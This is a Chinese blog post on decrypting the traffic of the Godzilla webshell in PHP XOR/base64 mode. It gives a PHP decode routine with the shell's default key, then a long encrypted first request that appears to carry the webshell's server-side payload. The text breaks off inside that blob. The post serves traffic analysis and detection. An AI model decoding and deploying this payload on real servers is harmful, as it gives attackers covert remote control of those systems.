哥斯拉还原加密流量

最新推荐文章于 2024-07-14 15:31:25 发布
最新推荐文章于 2024-07-14 15:31:25 发布
阅读量1.6w 收藏 9
点赞数 4
分类专栏: 网络安全 文章标签: php html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011250160/article/details/120501033
版权

感谢大佬的文章:哥斯拉Godzilla加密流量分析
首先在自己的网站上上传个马
设置好代理,方便burp抓包
在这里插入图片描述
注意以下为PHP_XOR_BASE64加密的数据包
一共抓到了三个包
第一个包
在这里插入图片描述
第二个包
在这里插入图片描述第三个包

在这里插入图片描述

第一个包

Request解密脚本

<?php

function encode($D,$K){
    for($i=0;$i<strlen($D);$i++){
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';

echo encode(base64_decode(urldecode('R0YEQgNVBE0GQ0YPU0YTUhoeTAtvMkVmMHRmD1NGE1IaHkwLbzIHTA1SQVtdWkFBFlhNFBJVEhAYPD8SEhRBQQZyAFYxQRJNBlxzR1xXSRpYO28QQhhBHTxicGEPEgZWF2UAQxFRDldLGA4%2FOBRBE0N2FlURSwhWDW5GRlNGFRtKDWg6QhhBGUdCUEFBXQ56BwsIVFcQElwQQlxdXGsIV0sfTAtvMkEZQxFcVBIcCEAQUxEYRmcyfDBifH18b0VABkUWWQ1xBWRKGE4%2FOBRBE0MWRRBCHD5qJmIIR1xHBEEKVwlZGF1JETAAeFtFbThBS1QEQwcOVX0GUlpWVxxFbDBzNmMrdy9iR0JQQUFdDnoHa0kUEV0SSgpefFYbGEVABkUWWQ1xBRBKGA4%2FOBRBE0NLaDpCGEEZI0JQQUFdDl08QRdZFl0%2BWg9eRlcaHVo%2BaTtvEEIYQVAFER1RU1oiUg9aIkoLSCVcAF5RVxodXA5SEENwC0smQwpBZkZAUQBeSxIVXRERSEJuOxUSEhRBE0MWQUAPS1xeGVVQUV1QBBtHRghDSwNsM0MRFRJPOWsTQxZFVg1KDFgXYVRAU1kERwZETRQSVRIQWDw%2FPzgUQRNDXwMQSlESSgZFHRZtZyRgOBQHSRJZEko8XkVXXGsDUhBTAVkQGjwQRRcRbWFxMmhBVBxAA0sSZgxBUFxtVgBABlIMQkBlXAQXQ0BXG09sOUMWRRBCGEEZI1NMQlNHEmwMRgBePVoASgZVXEAaHVo%2BaRZFEEJFbDNuOxUSEhRFQQZFEFwWBQRPAl1zR1xXSRpYO289aBhBGUNYUxIaED5gJmVEDV9WFFUPGE4%2FOBRBE0MWRRBCSwRKEFhaXG1HFVIRQk0ZWTVrGUMRFRISFEEXPGUgYzFxLnc4FUZXQUcIXCpSOA0AWRJcVQVqV1xXDlcGHjYBL1EWYDpDHUFXRghSD18fVUocPmomYhweFkcEQBBfCnkGEUgCbjsVEhIUQRNDFiVDB0sSUAxfakVAXRVWPFUJXxFdSRBYPD8SEhRBTm48aDpCGEEZClcVGlFVD3ACWgl3GFERfA1SWlZXHEgaGDtvEEIYQRlDERUWQFESRg9CWFcYXQ9aDFVQGhZGBEAWWhEcVBFaNGkRFRISSWw5bjxFEEIYE1wXREdcEhATVhBDCURZNWtEbjtTR1xXFVoMWEVjU3UITjpoRxoWcE0XKB8ePWgYQRlDV1pAGhAIDlMNQVleSxVLD1RbGhZwSAhHX04bSxgaNGkRFRISFEETQxIha0ZRPBleERF2aRAIbj0SLmtKHAgSUhgQAwdpWj5pFkUQQkVsM0MRFRJAURVGEVhFFCYDbDMePD9UR1oCRwpZCxAQXSVcBWJMQUZRDHUWWAYYS0NsM0MRFRJbUkEbQlAQXgFMCFYNblBKW0cVQEsUA1kOXT5eBkVqUV1aFVYNQhYSSxFBQm47FRISFEETQxYDRQxbFVAMXxVUW1gEbARTEW8BVw9NBl9BQRoQB1oPU0wQGTVrGUMRFRISFEETQxZFFAQYXBkjV1pCV1pJFwVfCVVOGhNbQRgOPzgUQRNDFkUQQhhBGUMVVl1cQARdF0VFDUJeAFUQVA4%2FOBRBE0MWRRBCGEEZQ1hTEhoQBxpDTWg6QhhBGUMRFRISFEETQxZFEAZXQUJDFVZdXEAEXRdFRR5fGAdeBkVGGhZSSAhDS0VHClENXEMZFFRXWwcbR1BMGVk1axlDERUSEhRBE0MWRU1vMkEZQxEVEhIUQRNDFgNTDlcSXEsVUxsJOWsTQxZFEEIYQRlDERVAV0AUQQ0WQVMNVhVcDUVGCT8%2BQRNDFkUQQhgcNGkRFRISSWw5QxZFEAteQRFCV0BcUUAIXA1pAEgLSxVKSxZSSFZRAlwHU0IZRB4HTA1SQVtdWj5WG18WRBF9GRFBVk9bXFINUhdTRxlLGBo0aREVEhIUQRNDUBBeAUwIVg0RUkhWUQJcB1NNFAZZFVhKPD8SEhRBE0MWRUtvMkEZQxEVEhIUQRNDFhdVFk0TV0NWT1tcUg1SF1NNQxdaEk0RGRFWU0AAH1IGSR1aEUgCbjsVEhIUQRNDFhg9aBhBGUNMODhPOWtVFlgGRAtXDxlFVlBGYVESQApZCxhLQ2wzQxEVElVYDlECWkUUPWskalg8PxISFEFBBkIQQgwYRWYwdGYJPz4cPmlQEF4BTAhWDRFXS0JVEkA8WRVVDGcDWBBUUVtAHEhIbjxFEEIYIR08d3x%2Bd3ogfiYWWBAiXAhLDVBYVxoQPmAmZDN1MGNGaiBjfGJmayd6L3MrcS99RmRKCjg4EhRBE0dXCVwkUQ1cEBEIEnJHAlINUgxCShw%2Bfyp9cHxzeSQaWDtvEEIYQR0AVWZGU0AUQF5QBFwRXVo0aREVEhJdBxNLEgRcDn4IVQZCFA9cQQ1fSk1oOkIYQRlDERUSVFsTVgJVDRBKHABVD3dcXldHQVIQFkFWC1QEdwJcUBsST2w5QxZFEEIYQRlDERUSW1JBG0dQDFwHdgBUBhAIEBwWRxVHUAxcB3YAVAYQCBAcGkMaGDtvEEIYQRlDERUSEhRBE0MWRVkEGEl5CkJqVltGSRcFXwlVLFkMXEoYTj84FEETQxZFEEIYQRlDERUSEhRBE0NfAxBKeAJRB1hHGhZSCF8GeARdBxFcBF5FR0dXHRo%2BaRZFEEIYQRlDERUSEhRBE0MWRRBCGEEZQxVWVmFAAEcWRVhEEE0EAm47FRISFEETQxZFEEIYQRlDERUSEhRBE0MWB0IHWQoCbjsVEhIUQRNDFkUQQhhBGUMRFRISFBw%2BaRZFEEIYQRlDERUSEhRBE0NLaDpCGEEZQxEVEhIUQRMeO289aBhBGUMRFRISSWw5QxZFEB81axlDERVbVBxAcwVfCVU9XRlQEEVGGhVWGEMCRRZvDUgEVzxTVEFXUAhBRB9DFkMcAl0wRVRGR0dISG48RRBCGEEZQxF1X1lQCEFLEQdJElkSSjxeRVdcawNSEFMBWRAfSAJuOxUSEhQcPmkWRRBCUQcZSxARUVZnFVIXQxYZGTVrGUMRFRISFEFzAF4BWRAQRlsaQVRBQWsOQwZYOlIDSwRdCkMSGwk5axNDFkVNbzJBGUMRdVtcXT5ABkJNFw1IBFc8U1RBV1AIQUQaQh5MH0gCbjsVEhIUIRc8cCx8J3YgdCYRCBJyUAhBDVcIVUocPmomY2N3YG9GYCBkLGA2ZydwL3R7c39xRm5KDWg6QhhBGSMVakJTQAkTXhYWRBBnE1wTXVRRVxxDbz8USRdNH00dPHd8fnd6IH4mH149aBhBGUNxEW1cQQwTXhYWRQBLFUs8UlpHXEBJFzxGBEQKFEYWRBgVGRIFWj5pFkUQQhw%2BUEMMFQIJOWsTQxZFRwpRDVxLFWpbEghBFzxYEF1LQ2wzQxEVEhIUQRMjVQ1UC0pJHk0fEhsJOWsTQxZFEEIYQR08WB4ZCTlrE0MWRU1vMkEZQxF1W1xdPkAGQk0XDUgEVzxTVEFXUAhBRBpCH0URWjRpERUSEl0HE0sXQVMGaxVYF0RGG0k5axNDFkUQQhhBeRFcUVtAHEVsJX8pdSx5LHxNFhoVHBMDShNXFkM9VxFcDW5XU0FRBVoREUwLbzJBGUMRSD84SWw5BUMLUxZRDldDV1pAX1UVYwJEBF0HTARLSxVFX0EdGj5pFkUQQl8NVgFQWRIWRABBAlsARAdKEgJuOxUSEhRFWg1SAEhfCFo0aREVEhIQClYaCwtFDlRaNGkRFRISQwlaD1NFGBZKFFxKSjg4EhRBE0MWRRBGSVwdE1xGaRZdD1cGTjgLbzJBGUMRFRISFAhVQx4KQgYQRUhKDAgCSgRTGhg7bxBCGEEZQxEVEhIUQRcPUwsNAEEVXBBlWntcQARUBkRNVwdMI0AXVEYaQUEDQBdETRQSVRIVR1hbVldMSgJPAkwZTghIAm47FRISFEETQxZFEEIYRVANVVBKGQlVCG48RRBCGEEZQxEVEhIURUUCWhBVX0sUWxBFRxoWRAxATxIMXgZdGRJSHRFeV1pICG48RRBCGEEZQxEVEhIURVoNUgBISQVFVQZfDj84FEETQxZFEEIYQRlDFUVTQFUMVhdTF0M5HApcGmwIFkRVDUYGDWg6QhhBGUMRFRISFEETR10ASV9WFFUPCjg4EhRBE0MWRRAfXQ1KBko4OBIUQRNDFkUQQhhBGUdaUEscCUVCWDtvEEIYQRlDERVPPz5BE0MWRRBCGEVQDVVQShkfWj5pFkUQQhhBGUNYUxIaEAhdB1MdDhFME1UGXx0WQlkSGk4HTEtvMkEZQxEVEhIUQRNDFgdCB1kKAm47FRISFEETQxYYPWgYQRlDTDg4TzlrVRZYBkQLVw8ZBkdUXnRBD1BLHx49aBhBGUNFR0tJOWsTQxZFEEIYQXkQVEZBW1sPbBREDEQHZwJVDEJQGhsPbDlDFkUQQhhBGUdSWVNBRy9SDlNYVwdMSRsAXlFXfFUMVkEfXj1oGEEZQxEVEhIQDFYXXgpULFkMXF5WUEYaFgxWF14KVCxZDFxBGA4%2FOBRBE0MWRRBCHD5qJmIIFFVRFWAGRRZZDVZJEFg8PxISFEETQxZFWQQYSR0OVEFaXVAvUg5TRA0MTQ1VSko4OBIUQRNDFkUQQhhBGQpXFRpBQBNfBlhNRBBRDBFHUllTQUcvUg5TTBlcCEhCbjsVEhIUQRNDFkUQQhhBGUMRXFQSHEVeBkINXwZ2AFQGDAgQW1oCXxZSAHMNXAQbSko4OBIUQRNDFkUQQhhBGUMRFRISFEETEVMRRRBWQVANUllHVlEiXAdTTRlZNWsZQxEVEhIUQRNDFkUQQhhBRAZdRldJOWsTQxZFEEIYQRlDERUSEhRBE0MWRVkEGElQEEJQRhoQPmAmZT4UAVQAShB%2FVF9XaUgaGDtvEEIYQRlDERUSEhRBE0MWRRBCGEEZQxEVQFdAFEENFgBGA1RJHTxicGFpEAJfAkUWfgNVBGRKCjg4EhRBE0MWRRBCGEEZQxEVEhIUQRMeUwlDB0NsM0MRFRISFEETQxZFEEIYQRlDERUSEhRBExFTEUUQVkEbGBVWXlNHEn0CWwBNQlYOGQ9eVFYQD2w5QxZFEEIYQRlDERUSEhRBE0MWRRAfNWsZQxEVEhIUQRNDFkUQQhhBRG47FRISFEETQxZFEEIYHFwPQlBJPz5BE0MWRRBCGEEZQxEVEhIUCFVDHgNFDFsVUAxfaldKXRJHEB5BXQdMCVYHf1RfVx1ISG48RRBCGEEZQxEVEhIUQRNDFkUQQhgTXBdER1wSEAxWF14KVCxZDFxLGA4%2FOBRBE0MWRRBCGEEZQxEVEhJJBF8QUx49aBhBGUMRFRISFEETQxZFEEIYQRlDQ1BGR0YPE0FQEF4BTAhWDRFOFl9RFVsMUitRD10cGQ1eQRJXTAhAFxRePWgYQRlDERUSEhRBE0MWRRBCRWwzQxEVEhIUQRNDFkUQHzVrGUMRFRISFEFOBloWVRk1axlDERUSEhRBE0MWRUIHTBRLDREXX1dACVwHeARdBxgoSkN%2FQF5eFlo%2BaRZFEEIYQRlDTDg4EhRBEx5VBEQBUEERJklWV0JACFwNFkFVS0NsM0MRFRISFEETEVMRRRBWQRsmY2d9YA5OHEEYQVVCFV8ZBFRBf1dHElIEU00ZWTVrGUMRFU8%2FPmw5HjtvVhdWAk0KXlsSVlENVhdTIVkQEEVJSko4OBIUQRNHW1hwBlETEUdBHAk%2FPkETQxYSWAtUBBEjFVMPFllMDRFTBFRKEUhCbjsVEhIUQRNDFkFABAVFSU0TGhAcEAcIbjxFEEIYQRlDEXVRWlkOV0sSFVZOCFYOVBgOPzgUQRNDFkUQQlEHEUtYRm1WXRMbR0YDGUseRxFHVxQPEBpDGkUQTRQEGVwbTR8XGxtPbDlDFkUQQhhBGUMRFRJWUQ1WF1MhWRAQRUkFGA4%2FOBRBE0MWRRBCGEEZQ3FHX1ZdExtHRgMZWTVrGUMRFRISFEFOBloWVUJRBxlLWEZtVF0NVksSFVZLHkcRR1cUDxAaQxpFEE0UBBlcG00fFxsbT2w5QxZFEEIYQRlDERUSckEPXwpYDhhGSAcQWDw%2FEhIUQRNDFkVNbzJBGUMRSD84FEETQxIIHVxbDVYQVB0bCTlrE0MWRXABUAxWBxkRQh4EVgRUH149aBhBGUNDUEZHRg8TI0QIVAtKSR0TGA4%2FOElsOQVDC1MWUQ5XQ1VQXldABHUKWgAYS0NsM0MRFRIWclxUBkJNEgRRDVwtUFhXEB1aPmkWRRBCUQcRCkJqVltGSRclH0xLbzJBGUMRFRISFBNWF0MXXkJcBFUGRVB2W0ZJFyUfWhINU0MDQVdUW14WWj5pFkUQQkUEVRBUTj84FEETQxZFEEJKBE0WQ1sSGlIIXwZpAEgLSxVKSxVzGw10FF0PXwtbShwnEFwTWlkQDkNVAl8JElgaB1gKXRcbCTlrE0MWRU1vMhw0aVdAXFFACFwNFhZVFn4IVQZwQUZAHEhIbjxFEEIYRU0aQVASDxQGVhceR0QbSAQbSgo4OBIUQRNHVxFEEBhcGQRUQRoQVRVHERRMC28yQRlDERFUW1gEfQJbABBfGAZcFxkXVFtYBH0CWwASSwNsM0MRFRIWRgRHQwtFEixNDVVBCjg4EhRBEwpQRRhGTBhJBhAIXEdYDRVFEgREFkpABA1EWV4UEkVVCloAfgNVBBheX0BeXh1BSG48RRBCGEEZQxFcVBIcRUcaRgANXxoHUA9Ud1NBXQJyF0IXEktDbDNDERUSEhRBE0MWRRALXkERI1JdX11QSRcFXwlVLFkMXE9SWlxEURNHJV8JVTJdE1QKQkZbXVoSG0dXEUQQEUgQGDw%2FEhIUQRNDFkUQQhhBGUMRFUBXQBRBDRZHXwkaWjRpERUSEhRBE0MWRRBCRQRVEFROPzgUQRNDFkUQQhhBGUMRFRISRgRHFkQLEEBeAFAPEw4%2FOBRBE0MWRRBCGEEZQ0w4OBIUQRNDFkUQH10NSgYRXFQSHEVHGkYADV8aB1APVGFbX1EgRxdERxkZNWsZQxEVEhIUQRNDFkVZBBhJeRdeQFFaHEVVCloAfgNVBBVHUEFGQB1ISG48RRBCGEEZQxEVEhIUQRNDFhdVFk0TV0MTWlkQD2w5QxZFEEIYQRlDERUST1ENQAZNaDpCGEEZQxEVEhIUQRNDFkUQEF0VTBFfFRBUVQhfQQ1oOkIYQRlDERUSEhRBEx47bxBCGEEZQxEVT1dYElYYO28QQhhBGUMRFRISFEFBBkIQQgwYQ1cMEXBKUUEVVjdPFVVAA2wzQxEVEhIUQRMeO28QQhhBRAZdRldJOWsTQxZFEEIYQR0RVEEPEEAYQwYWCkJCWRVNERFaQBJSCF8GeARdBxgISkNfQF5eFlo%2BaRZFEEJFbDNDERUSQFEVRhFYRRQQXRUCbjtIPzhSFF0AQgxfDBgHUA9UZ1dfWxVWJ1kSXkoRGjRpERUSEhAUQQ8LAlUWEENMEV0XGwk5axNDFkUUEVkXXCVYWVcPUwRHSxQWURRdJ1APVBcbCTlrE0MWRVkEGEkdFkNZEw9aFF8PEEMUEVkXXCVYWVcTCQ9GD1pMEBk1axlDERUSEhRBFwdXEVFfeAdQD1RqVVdAPlAMWBFVDEwSEUdER14bD2w5QxZFEEIYQRkKVxUaFlAARwIXWA0EWQ1KBhhOPzgUQRNDFkUQQhhBGUNYUxIadAdaD1M6QBdMPloMX0FXXEASG0dFBEYHfghVBh0RVlNAABpCC1hWA1QSXEpKODgSFEETQxZFEEIYQRlDERUSclcJXgxSTRQRWRdcJVhZVx4EVgRUH149aBhBGUMRFRISFEETQxZFEEJKBE0WQ1sSEFsKEVg7bxBCGEEZQxEVEhIUQU4GWhZVGTVrGUMRFRISFEETQxZFEEIYQUsGRUBAXBRDRBFfEVVCXgBQDxMOPzgUQRNDFkUQQhhBGUNMODgSFEETQxZFEB9dDUoGSjg4EhRBE0MWRRBCGEEZEVRBR0BaQRERUwRUQl4AUA8TDj84FEETQxZFEEJFbDNDERUST1ENQAZNaDpCGEEZQxEVEkBRFUYRWEUSF0oNGQxDFUFTQgR1CloAEAtLQVcWXVkQCTlrE0MWRU1vMhw0aVdAXFFACFwNFgZfEkEnUA9UHRtJOWsTQxZFFBFKAn8KXVB8U1kEDgRTERhASxNaJVhZV3xVDFZBH149aBhBGUMVUVdBQCdaD1MrUQ9dXF4GRR0QVlESRyVfCVUsWQxcQRgOPzgUQRNDXwMQSngISjxXXF5XHEVAEVUjWQ5dL1gOVBwbSTlrE0MWRRBCGEFQBREdUV1EGBtHRRdTJFENXC1QWFceEAVWEEIjWQ5dL1gOVBwbSTlrE0MWRRBCGEEZQxEVQFdAFEENFkdfCRpaNGkRFRISFEETQ0sAXBFdGjRpERUSEhRBE0MWRRBCSgRNFkNbEhBSAFoPFF49aBhBGUMRFRISSWw5QxZFEB9dDUoGSjg4EhRBE0MWRRAQXRVMEV8VEGZcBBMXVxdXB0xBXQxURhJcWxUTBk4MQxYYDktDWEYSXFsVEwIWA1kOXUMCbjsVEhIUHD5pS2g6BE0PWhdYWlwSWQ5FBnAMXAcQSEJuOxUSEhRFQBFVI1kOXS9YDlQIVVdASREQRAZ2C1QEdwJcUBAbD2w5QxZFEEZcBEoXd1xeV3oAXgYLAlUWEENdBkJBdFtYBH0CWwASSwNsM0MRFRJbUkEbEVMLUQ9dSR0QQ1Z0W1gEfQJbABxGXARKF3dcXld6AF4GH0xLbzJBGUMRFRISFBNWF0MXXkIaDlJBCjg4EhRBEx5TCUMHQ2wzQxEVEhIUQRMRUxFFEFZBGwVQXF4QD2w5QxZFEB81azRpTDg4VEEPUBdfCl5CXwRNIVBGW1FHKF0FWU0ZbzIaNGkRFRISEAVSF1dFDUJZE0sCSB0bCTlrE0MWRRQGWRVYOBZ6QXtaB1xEa0UNQngRURNuQFxTWQQbSg1oOkIYQRlHVVRGU29GcBZEF1UMTDRKBkMSbxIJQXMEUxFvAU0TSwZfQW1HRwRBSx9ePWgYQRlDFVFTRlU6FCBDF0IHVhVsEFRHFW8UXBMQQhdcB1ZJTRFYWBoWUABHAm1CcxdKE1wNRWBBV0ZGbkofRQ5CCEEGQxVRU0ZVOhQgQxdCB1YVbBBURxVvFFsTRHgwfC4fWjRpERUSEhAFUhdXPhcwfSx2N3Rqc3ZwMxQ%2BFlgQIhw%2BaiZjY3dgb0ZhJnsqZCdnIH0nYxJvCTlrE0MWRRQGWRVYOBZnd397NXY8ZipiNh88GV4RdRZtZyRhNXM3a0VqJHQsZXBtYnszZ0RrXj1oGEEZQxVRU0ZVOhQrYjFgPWA%2BfyxjYnNgcCR3PHAqYkVlQQRDcRFtYXEzZSZkPhcqbDVpPGlqdH1mNnIxciB0PX4ua0RsDj84FEETQxIBURZZOh4rZWFibXcteiZ4MW8raEZkQwwVchZrMnYxYCBiOR8pbTdhanF%2BfSR9N2ksYEVlWjRpERUSEhAFUhdXPhcxfTNvJmNqc3ZwMxQ%2BFlgQIhw%2BaiZjY3dgb0ZgJmQzdTBnIH0nYxJvCTlrE0MWRRQGWRVYOBZmd2BiJGE8eCR9Jx88GV4RdRZtZyRhNXM3a0VrJGs1dGdtfHUsdkRrXj1oGEEZQxVRU0ZVOhQwczdmJ2o%2BaSxjYRVvFFwTIxI6YydqN3wxahJhd2Y3djFpNX8wbEZkWDw%2FEhIUQRcHVxFROR8FUBBQV15XawdGDVURWQ1WEh4%2BEQgScl0PWjxRAERKHwVQEFBXXldrB0YNVRFZDVYSHkoKODgSFEETR1IERANjRl0KQlRQXlE%2BVRZYBkQLVw9KRGwVDxJHFUEPUwsYFkoIVEsVUVNGVToUB18WUQBUBGYFRFtRRl0OXRAROBlLGF8ZUxEKEhZQAEcCbUJUC0sAWw9UalRHWgJHClkLQ0VlQQNDcVJXRmsCVQRpE1EQEEZdCkJUUF5RPlUWWAZEC1cPSkQYDj84FEETQxIBURZZOh4sQVBcbVYAQAZSDEJFZUEEQ3FcXFtrBlYXHkJfEl0PZgFQRldWXRMUSg1oOkIYQRlHVVRGU29GRwpbAEoNVgQePhEIEnJdD1o8UQBESh8FWBdUG0ZbWQRJDFgAF0sDbDNDERUSFlAARwJtQlUMWw5dBhZoEg8UIVoNXzpXB0xJHgZJXFQcUQ9QDFIAbxdWCFoMVVAVGw9sOUMWRRBGXABNAmoSV0pABF0QXwpePVwIS0RsFQ8SdAhdCmkCVRYQRlwbRVBcQV0OXTxSDEJFEVo0aREVEhIQBVIXVz4XEUESZgRUQW1GUQxDPFIMQkVlQQRDcUZLQWsGVhdpEVUPSD5dCkMdGwk5axNDFkUUBlkVWDgWXFxRWBRXBmkVURZQRmRDDBVyW1oIbARTERhFUQ9aD0RRV21EAEcLEUwLbzJBGUMREVZTQABoRHIqczd1JHc3bmd9fWBGbkMLRRQ9ayRrNXRnaRVwLnA2eyB%2BNmczdixlEm8JOWsTQxZFFAZZFVg4FmV6YmsycjN%2FQm1CBUFpK2FqYXNkKAhuPEUQQhhFXQJFVGkVZCljPGAgYjFxLndEbBUPEmQpYzxgIGIxcS53WDw%2FEhIUQRcHVxFROR8xcTNufHxmazJ6OXNCbUIFQWkrYWp7fGA%2BYCpsIAtvMkEZQxERVlNAAGhEVQReIVkNVSRLXEJ2UQJcB1NCbUIFQVoCX3ZTXlgmSQpGIVUBVwVcSxgOPzgUQRNDEgFRFlk6HgBQW3FTWA10GV8VdQxbDl0GFmgSDxQCUg11BFwOfxtQE3RbUV1QBBtKDWg6QhhBGUdVVEZTb0ZABkUWWQ1WPlcCXFAVbxRcEyNfC1k9XwRNSxNGV0FHCFwNGAtRD11DEFg8PxISFEEXB1cRUTkfElwQQlxdXGsSUhVTOkADTAkePhEIEnJdD1o8UQBEShoSXBBCXF1cGhJSFVM6QANMCRtKCjg4EhRBE0dSBEQDY0ZKBkJGW11aPkACQABvClkPXQ9URxVvFFwTI18LWT1fBE1LE0ZXQUcIXA0YFlEUXT5RAl9RXldGQxpYO28QQhhBHQdQQVNpExJWEEUMXwxnElwRWFReW04EbAtXC1QOXRMePhEIEnJdD1o8UQBEShoSXBBCXF1cGhJWEV8EXAtCBGYLUFtWXlETEUoNaDpCGEEZR1VURlNvRkYQUxdvC1YIZgVYWVdcVQxWRGtFDUJ4CFcKblJXRhxDRhBTF28LVggXBVhZV1xVDFZBH149aBhBGUMVUVNGVToUDlMIXxBBPlUKXFxGFWlBDkN2DF4LZwZcFxkSX1dZDkEaaQlZD1EVHkoKODgSFEETR1IERANjRkwTXVpTVmsMUhtpA1kOXRJQGVQSbxIJQXMKWAxvBV0VEURERV5dVQVsDlcdbwRRDVwQWE9XFR1aPmkWRRBCHAVYF1BuFUJbEkc8WwRIPUsIQwYWaBIPFCFaDV86VwdMSR4TXkZGbVkASzxFDEoHH0gCbjsVEhIURVcCQgRrRVUAQTxUTVdRQRVaDFg6RAtVBB4%2BEQgScl0PWjxRAERKHwxYG25QSldXFEcKWQtvFlEMXEQYDj84FEETQxIBURZZOh4OUE1tW1oRRhdpEVkPXUZkQwwVcltaCGwEUxEYRVUAQTxYW0JHQD5HClsAF0sDbDNDERUSFlAARwJtQlQHXgBMD0VqQV1XClYXaRFZD10OTBcWaBIPFCFaDV86VwdMSR4HVFNTR1gVbBBZBlsHTD5NClxQXUdARhpYO28QQhhBHQdQQVNpEwxKBF8BFz8YXBkjVlBGX00GWgceTAtvMkEZQxERVlNAAGhEWxxAC1xGZEMMFXJVURVeGkYMVEoRWjRpERUSEhAFUhdXPhcxfTNvJmNqYX1yNWQiZCBJElEFHj4RCBJyED5gJmQzdTBjRmomY2N3YGsyfCViMnEwfUZkWDw%2FEhIUQRcHVxFROR8yfDFncGBtZC5hNxE4EF8YIR08YnBgZHEzaERlIGI0fTNmM35nZhVpWj5pFkUQQhwFWBdQbhVeWwBXBlI6VRpMBFcQWFpcQRM8E14WJVkPSA1WB1QdFR4TTRMjUQBEPVQOWAdUUW1XTBVWDUUMXwxLSRBKCjg4EhRBE0dSBEQDY0ZKC15HRm1bEVYNaRFRBR88GV4RdVVXQD5QBVE6RgNKSR4QWVpARmsOQwZYOkQDX0YQWDw%2FEhIUQRcHVxFROR8SUQxDQW1dRARdPEIEV0VlQQRDcR1bXEBIFwdXEVE5HxJRDENBbV1EBF08QgRXRWVBBF4RBBINFEZHEUMAF0ICQR4FUFlBVxNaPmkWRRBCHAVYF1BuFVNHEWwXVwJDRWVBBENxUldGawJVBGkTURAQRlgQQWpGU1MSFEoNaDpCGEEZR1VURlNvRlIQRjpEA18SHj4RCBIaXQ9HShIBURZZOh4CQkVtRlUGQERrRQ1fGFAZXBESRkBBBBRDDEUXBFkNSgYWDj84FEETQxIBURZZOh4QUFNXbVkOVwYROBBfGCFeBkVqUVRTPkUCRE0XEVkHXDxcWlZXE0gIbjxFEEIYRV0CRVRpFUcAVQZpCF8GXUZkQwwVGltaFRpHUgREA2NGSgJXUG1fWwVWRGtFDV8YUBlcERJGQEEEFEMMRRcEWQ1KBhYOPzgUQRNDEgFRFlk6HiBER0BXWhV3CkRCbUIFQUoXQ2pAV0QNUgBTTRc%2BZEYVQxYaFR4UIVcKRAtRD11JHTxicGBkcTNoRGUmYitoNWYleHl3fHUsdkRrTBlZNWsZQxEVFmF3M3ozYjp2K3QkdyJ8cA9yUAhBDVcIVUocPmomY2N3YG9GYCBkLGA2ZydwL3R7c39xRm5KDWg6QhhBGUdVVEZTb0Z1CloAYg1XFR4%2BEQgSFRNaPmkWRRBCUQcZS0JAUEFAExtHZSZiK2g1ZiV4eXd8dSx2TxZVHEIJSBlCDBUVHRNIExhQCkIHWQJRQxlHU1xTBBtEd0IcQh87HkoRVEESEC0aGBYMVkIQIVAQblFbQBxDSEd6GApAEUhCQxVRU0ZVOhQlXwlVMFcOTURsFRwPFENIR3oYCk0DQwIeTA5PCTlrE0MWRRQGWRVYOBZzW15RM1wMQkJtQgVBERBFR15XWklHEV8IGEZcAE0CahJ0W1gEYQxZERc%2FEUgZXREFEg0URVcCQgRrRX4IVQZjWl1GEzwTWRZCH0URWjRpERUSEhAFUhdXPhckUQ1cMV5aRhVpXBMQQwdDFko%2BWgxEW0YaEAVSF1c%2BFyRRDVwxXlpGFWlNQBZUFkQQEEVqIGN8YmZrJ3ovcytxL31NGVMdFQMbHV0OUwkWRQBLFUtLFWZxYH0xZzxwLHwndiB0Jh0VAh4UUBpNFF8fQAJFXQJFVGkVcghfBmQKXxYfPAJuOxUSEhRFQQZFEFwWBUMbWDw%2FEhIUQVUMRABRAVBJHQdQQVMSVRITR10ASV8GRU8CXUBXG09sOUMWRRBCGEEZR0NQQUdYFR1eEg5VGxZDGVkRFxwWQgBfFlNLEj5WQwJuOxUSEhQcPmkWRRBCSgRNFkNbEhZGBEAWWhELbzIcNGlXQFxRQAhcDRYCVRZ%2BCFUGGRxJPz5BE0MWQVQLSlxeBkUdFVZdE30CWwAXSwNsM0MRFRIWUAhBXh4WRBBUBFdLcUFAW1lJFwdfFxlLBlEQXEVHW18cRVcKREwKEUwTZhFURV5TVwQbRGo5F04fTh5PVVxAXFUMVktpOnYrdCRmPBgcCT8%2BQRNDFkFUC0pPBEEeFwk%2FPkETQxZBQANMCQRHVVxACTlrE0MWRRQDVA1%2FCl1QQRIJQXMQVQReBlETEUdBVEZaHVo%2BaRZFEEIcBVgXUAgQEA9sOUMWRRALXkERR1BZXnRdDVYQF1heF1QNEBg8PxISFEETQxZFFAZZFVhNDBddWRZaPmkWRRBCGEEZQxVRU0ZVTw5BagsSWTVrGUMRFRISFEEXB1cRUUwFRUkCRV0JPz5BE0MWRRBCGEVdAkVUHA8WPV1BDWg6QhhBGUMRFRJUWxNWAlUNEEocAFUPd1xeV0dBUhAWQVYLVAR3AlxQGxJPbDlDFkUQQhhBGUMRFRJbUkEbR1AMXAd2AFQGEAgQHBZHFUdQDFwHdgBUBhAIEBwaQxoYO28QQhhBGUMRFRISFEETQxZFFARNDVUzUEFaEglBFxNXEVhMHAdQD1R7U19RWj5pFkUQQhhBGUMRFRISFEETQxIJWQxdJVgXUAhTQEYASksfXj1oGEEZQxEVEhIUQRNDFkUQQlkTSwJIakJHRwkbR1oMXgd8AE0CHRFUW1gEfQJbABlZNWsZQxEVEhIUQRNDFkUQQhhBWBFDVEttRBRACx5BXAtWBH0CRVQecl0SbAVfCVVKHAdMD11lU0ZcSAxBB0cKQAhDEFg8PxISFEETQxZFEEIYQRlDERVTQEYASjxGEEMKEEVVCl9QdlNAAB8HVxFVSho4FA4cURJ6DggJEBRJECJeCFUGXEFbX1FJFwVDCVwyWRVRShgcCT8%2BQRNDFkUQQhhBGUMRFRISFABBEVccbxJNElFLFVlbXFElUhdXSXAEUQ1cEFhPVxoQB0YPWjVRFlBIEFg8PxISFEETQxZFEEIYQRlDERUWVEZcGyNfFm8QXQBdAlNZVxoQB0YPWjVRFlBIBkFjFwgQFkgdS3YMQz1PE1AXUFdeVxxFVRZaCWADTAkQXBNiEAgWQxpNHiVZEWcEQQZSQEZTVg1WSxIDRQ5UMVgXWRwNEGxDCUEUTAtvMkEZQxEVEhIUQRNDFkUQQhgASxFQTG1CQRJbSxIJWQxdJVgXUBkaQUATXwZYTRQESkgHUw4RVEAOQ3VBH0wLbzJBGUMRFRISFEETQxZFEEIYRV0CRVQcDxwI